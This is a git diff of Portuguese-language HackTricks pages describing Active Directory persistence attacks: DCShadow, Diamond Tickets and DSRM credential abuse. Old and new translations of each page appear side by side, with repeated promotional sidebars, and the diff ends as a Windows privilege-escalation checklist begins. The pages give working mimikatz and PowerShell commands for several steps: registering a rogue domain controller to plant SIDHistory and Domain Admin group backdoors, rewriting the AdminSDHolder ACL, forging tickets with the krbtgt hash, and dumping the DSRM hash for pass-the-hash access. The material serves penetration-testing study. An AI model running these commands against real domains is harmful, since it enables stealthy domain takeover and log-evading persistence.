<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
- Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
Outras formas de apoiar o HackTricks:
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
- Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Compartilhe seus truques de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [repositório hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Participe do grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou do grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

111
windows-hardening/active-directory-methodology/dcshadow.md
View file

@ -1,9 +1,24 @@
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
# DCShadow
Ele registra um **novo Controlador de Domínio** no AD e o usa para **inserir atributos** (SIDHistory, SPNs...) em objetos especificados **sem** deixar nenhum **registro** das **modificações**. Você **precisa de privilégios DA** e estar dentro do **domínio raiz**.\
Observe que se você usar dados incorretos, registros bastante feios aparecerão.
Registra um **novo Controlador de Domínio** no AD e o utiliza para **inserir atributos** (SIDHistory, SPNs...) em objetos especificados **sem** deixar quaisquer **logs** referentes às **modificações**. Você **precisa de privilégios de DA** e estar dentro do **domínio raiz**.\
Note que se você usar dados incorretos, logs muito feios aparecerão.
Para realizar o ataque, você precisa de 2 instâncias do mimikatz. Uma delas iniciará os servidores RPC com privilégios do SYSTEM (você deve indicar aqui as alterações que deseja realizar), e a outra instância será usada para inserir os valores:
Para realizar o ataque, você precisa de 2 instâncias do mimikatz. Uma delas iniciará os servidores RPC com privilégios de SYSTEM (você tem que indicar aqui as mudanças que deseja realizar), e a outra instância será usada para inserir os valores:
{% code title="mimikatz1 (servidores RPC)" %}
```bash
@ -11,79 +26,89 @@ Para realizar o ataque, você precisa de 2 instâncias do mimikatz. Uma delas in
!processtoken
lsadump::dcshadow /object:username /attribute:Description /value="My new description"
```
{% code title="mimikatz2 (push) - Necessita de DA ou similar" %}{% endcode %}
{% endcode %}
{% code title="mimikatz2 (push) - Necessita de DA ou similar" %}
```bash
lsadump::dcshadow /push
```
{% endcode %}
Observe que **`elevate::token`** não funcionará na sessão mimikatz1, pois isso eleva os privilégios da thread, mas precisamos elevar o **privilégio do processo**.\
Você também pode selecionar um objeto "LDAP": `/object:CN=Administrador,CN=Usuários,DC=JEFFLAB,DC=local`
Observe que **`elevate::token`** não funcionará na sessão mimikatz1, pois isso elevou os privilégios da thread, mas precisamos elevar o **privilégio do processo**.\
Você também pode selecionar um objeto "LDAP": `/object:CN=Administrator,CN=Users,DC=JEFFLAB,DC=local`
Você pode aplicar as alterações a partir de um DA ou de um usuário com essas permissões mínimas:
Você pode aplicar as alterações a partir de um DA ou de um usuário com estas permissões mínimas:
* No **objeto de domínio**:
* _DS-Install-Replica_ (Adicionar/Remover Réplica no Domínio)
* _DS-Replication-Manage-Topology_ (Gerenciar Topologia de Replicação)
* _DS-Replication-Synchronize_ (Sincronização de Replicação)
* O objeto **Sites** (e seus filhos) no **contêiner de configuração**:
* _CreateChild e DeleteChild_
* O objeto do **computador registrado como DC**:
* _WriteProperty_ (Não Write)
* O **objeto de destino**:
* _WriteProperty_ (Não Write)
* No **objeto do domínio**:
* _DS-Install-Replica_ (Adicionar/Remover Réplica no Domínio)
* _DS-Replication-Manage-Topology_ (Gerenciar Topologia de Replicação)
* _DS-Replication-Synchronize_ (Sincronização de Replicação)
* O **objeto Sites** (e seus filhos) no **contêiner de Configuração**:
* _CreateChild e DeleteChild_
* O objeto do **computador registrado como um DC**:
* _WriteProperty_ (Não Write)
* O **objeto alvo**:
* _WriteProperty_ (Não Write)
Você pode usar [**Set-DCShadowPermissions**](https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Set-DCShadowPermissions.ps1) para dar esses privilégios a um usuário sem privilégios (observe que isso deixará alguns logs). Isso é muito mais restritivo do que ter privilégios de DA.\
Por exemplo: `Set-DCShadowPermissions -FakeDC mcorp-student1 SAMAccountName root1user -Username student1 -Verbose` Isso significa que o nome de usuário _**student1**_ quando conectado na máquina _**mcorp-student1**_ tem permissões DCShadow sobre o objeto _**root1user**_.
Você pode usar [**Set-DCShadowPermissions**](https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Set-DCShadowPermissions.ps1) para conceder esses privilégios a um usuário sem privilégios (observe que isso deixará alguns logs). Isso é muito mais restritivo do que ter privilégios de DA.\
Por exemplo: `Set-DCShadowPermissions -FakeDC mcorp-student1 SAMAccountName root1user -Username student1 -Verbose` Isso significa que o nome de usuário _**student1**_ quando logado na máquina _**mcorp-student1**_ tem permissões de DCShadow sobre o objeto _**root1user**_.
## Usando DCShadow para criar backdoors
{% code title="Definir Enterprise Admins em SIDHistory para um usuário" %}
{% code title="Definir Enterprise Admins no SIDHistory de um usuário" %}
```bash
lsadump::dcshadow /object:student1 /attribute:SIDHistory /value:S-1-521-280534878-1496970234-700767426-519
lsadump::dcshadow /object:student1 /attribute:SIDHistory /value:S-1-521-280534878-1496970234-700767426-519
```
{% code title="Alterar o ID do Grupo Primário (colocar usuário como membro dos Administradores do Domínio)" %}
{% endcode %}
{% code title="Alterar PrimaryGroupID (colocar usuário como membro de Administradores de Domínio)" %}
```bash
lsadump::dcshadow /object:student1 /attribute:primaryGroupID /value:519
```
{% code title="Modificar o ntSecurityDescriptor do AdminSDHolder (dar Controle Total a um usuário)" %}
{% endcode %}
{% code title="Modificar ntSecurityDescriptor do AdminSDHolder (conceder Controle Total a um usuário)" %}
```bash
#First, get the ACE of an admin already in the Security Descriptor of AdminSDHolder: SY, BA, DA or -519
(New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=Admin SDHolder,CN=System,DC=moneycorp,DC=local")).psbase.Objec tSecurity.sddl
#Second, add to the ACE permissions to your user and push it using DCShadow
lsadump::dcshadow /object:CN=AdminSDHolder,CN=System,DC=moneycorp,DC=local /attribute:ntSecurityDescriptor /value:<whole modified ACL>
```
## Shadowception - Dar permissões DCShadow usando DCShadow (sem logs de permissões modificadas)
```markdown
{% endcode %}
Precisamos adicionar os seguintes ACEs com o SID do nosso usuário no final:
## Shadowception - Conceder permissões DCShadow usando DCShadow (sem registros de permissões modificadas)
* No objeto de domínio:
* `(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;SIDdoUsuário)`
* `(OA;;CR;9923a32a-3607-11d2-b9be-0000f87a36b2;;SIDdoUsuário)`
* `(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;SIDdoUsuário)`
* No objeto do computador do atacante: `(A;;WP;;;SIDdoUsuário)`
* No objeto do usuário de destino: `(A;;WP;;;SIDdoUsuário)`
* No objeto Sites no contêiner de Configuração: `(A;CI;CCDC;;;SIDdoUsuário)`
Precisamos adicionar as seguintes ACEs com o SID do nosso usuário no final:
* No objeto do domínio:
* `(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)`
* `(OA;;CR;9923a32a-3607-11d2-b9be-0000f87a36b2;;UserSID)`
* `(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)`
* No objeto do computador atacante: `(A;;WP;;;UserSID)`
* No objeto do usuário alvo: `(A;;WP;;;UserSID)`
* No objeto Sites no contêiner de Configuração: `(A;CI;CCDC;;;UserSID)`
Para obter a ACE atual de um objeto: `(New-Object System.DirectoryServices.DirectoryEntry("LDAP://DC=moneycorp,DC=loca l")).psbase.ObjectSecurity.sddl`
Note que, neste caso, você precisa fazer **várias alterações,** não apenas uma. Então, na **sessão mimikatz1** (servidor RPC) use o parâmetro **`/stack` com cada alteração** que você deseja fazer. Desta forma, você só precisará **`/push`** uma vez para realizar todas as alterações acumuladas no servidor desonesto.
Para obter o ACE atual de um objeto: `(New-Object System.DirectoryServices.DirectoryEntry("LDAP://DC=moneycorp,DC=local")).psbase.ObjectSecurity.sddl`
Observe que, neste caso, você precisa fazer **várias alterações,** não apenas uma. Portanto, na sessão **mimikatz1** (servidor RPC), use o parâmetro **`/stack` com cada alteração** que você deseja fazer. Dessa forma, você só precisará fazer **`/push`** uma vez para executar todas as alterações empilhadas no servidor falso.
[**Mais informações sobre DCShadow em ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1207-creating-rogue-domain-controllers-with-dcshadow)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
- Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
Outras formas de apoiar o HackTricks:
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
- Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas dicas de hacking enviando PRs para os repositórios github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
```

48
windows-hardening/active-directory-methodology/diamond-ticket.md
View file

@ -2,33 +2,31 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
- Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
Outras formas de apoiar o HackTricks:
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
- Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## Diamond Ticket
**Assim como um bilhete de ouro**, um bilhete de diamante é um TGT que pode ser usado para **acessar qualquer serviço como qualquer usuário**. Um bilhete de ouro é forjado completamente offline, criptografado com o hash krbtgt desse domínio e, em seguida, passado para uma sessão de logon para uso. Como os controladores de domínio não rastreiam TGTs que emitiram legitimamente, eles aceitarão felizmente TGTs que são criptografados com seu próprio hash krbtgt.
**Como um golden ticket**, um diamond ticket é um TGT que pode ser usado para **acessar qualquer serviço como qualquer usuário**. Um golden ticket é forjado completamente offline, criptografado com o hash krbtgt daquele domínio e, em seguida, inserido em uma sessão de logon para uso. Como os controladores de domínio não rastreiam TGTs que eles (ou elas) emitiram legitimamente, eles aceitarão felizmente TGTs que estão criptografados com seu próprio hash krbtgt.
Existem duas técnicas comuns para detectar o uso de bilhetes de ouro:
Existem duas técnicas comuns para detectar o uso de golden tickets:
* Procure por TGS-REQs que não tenham um AS-REQ correspondente.
* Procure por TGTs que tenham valores bobos, como o tempo de vida padrão de 10 anos do Mimikatz.
* Procurar por TGS-REQs que não têm um AS-REQ correspondente.
* Procurar por TGTs que têm valores absurdos, como a validade padrão de 10 anos do Mimikatz.
Um **bilhete de diamante** é feito **modificando os campos de um TGT legítimo que foi emitido por um DC**. Isso é alcançado **solicitando** um **TGT**, **descriptografando-o** com o hash krbtgt do domínio, **modificando** os campos desejados do bilhete e, em seguida, **recriptografando-o**. Isso **supera as duas deficiências mencionadas anteriormente** de um bilhete de ouro porque:
Um **diamond ticket** é feito **modificando os campos de um TGT legítimo que foi emitido por um DC**. Isso é alcançado **solicitando** um **TGT**, **descriptografando** com o hash krbtgt do domínio, **modificando** os campos desejados do ticket e, em seguida, **recriptografando**. Isso **supera as duas desvantagens mencionadas anteriormente** de um golden ticket porque:
* TGS-REQs terão um AS-REQ precedente.
* O TGT foi emitido por um DC, o que significa que terá todos os detalhes corretos da política Kerberos do domínio. Embora esses possam ser forjados com precisão em um bilhete de ouro, é mais complexo e está aberto a erros.
* O TGT foi emitido por um DC, o que significa que terá todos os detalhes corretos da política Kerberos do domínio. Embora esses possam ser forjados com precisão em um golden ticket, é mais complexo e sujeito a erros.
```bash
# Get user RID
powershell Get-DomainUser -Identity <username> -Properties objectsid
@ -39,20 +37,20 @@ powershell Get-DomainUser -Identity <username> -Properties objectsid
# /ticketuser is the username of the principal to impersonate.
# /ticketuserid is the domain RID of that principal.
# /groups are the desired group RIDs (512 being Domain Admins).
# /krbkey is the krbtgt AES256 hash.
# /krbkey is the krbtgt AES256 hash.
```
```
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
- Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
Outras formas de apoiar o HackTricks:
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
- Adquira [**produtos oficiais PEASS & HackTricks**](https://peass.creator-spring.com)
- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
```

43
windows-hardening/active-directory-methodology/dsrm-credentials.md
View file

@ -1,39 +1,54 @@
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
# Credenciais DSRM
Existe uma conta de **administrador local** dentro de cada **DC**. Tendo privilégios de administrador nesta máquina, você pode usar o mimikatz para **dump o hash do administrador local**. Em seguida, modificando um registro para **ativar esta senha** para que você possa acessar remotamente este usuário de Administrador local.\
Primeiro, precisamos **dump** o **hash** do usuário **Administrador local** dentro do DC:
Existe uma conta de **administrador local** dentro de cada **DC**. Tendo privilégios de admin nesta máquina, você pode usar mimikatz para **despejar o hash do Administrador local**. Em seguida, modificando um registro para **ativar esta senha** para que você possa acessar remotamente este usuário Administrador local.\
Primeiro precisamos **despejar** o **hash** do usuário **Administrador local** dentro do DC:
```bash
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
```
Então precisamos verificar se essa conta funcionará e, se a chave do registro tiver o valor "0" ou não existir, você precisa **defini-la como "2"**:
Então precisamos verificar se essa conta funcionará, e se a chave do registro tem o valor "0" ou se ela não existe, você precisa **defini-la como "2"**:
```bash
Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 #Change value to "2"
```
Então, usando um PTH, você pode **listar o conteúdo de C$ ou até mesmo obter um shell**. Observe que, para criar uma nova sessão do powershell com aquele hash na memória (para o PTH), **o "domínio" usado é apenas o nome da máquina DC:**
Então, usando um PTH você pode **listar o conteúdo do C$ ou até obter um shell**. Observe que para criar uma nova sessão do powershell com esse hash na memória (para o PTH) **o "domínio" utilizado é apenas o nome da máquina DC:**
```bash
sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$
```
Mais informações sobre isso em: [https://adsecurity.org/?p=1714](https://adsecurity.org/?p=1714) e [https://adsecurity.org/?p=1785](https://adsecurity.org/?p=1785)
## Mitigação
* Evento ID 4657 - Auditoria da criação/mudança de `HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior`
* Evento ID 4657 - Auditoria da criação/alteração de `HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior`
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
- Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
Outras formas de apoiar o HackTricks:
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
- Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

143
windows-hardening/checklist-windows-privilege-escalation.md
View file

@ -1,30 +1,137 @@
# Checklist - Escalação de Privilégios Local no Windows
# Checklist - Escalação de Privilégios Locais no Windows
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
- Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
Outras formas de apoiar o HackTricks:
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
- Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
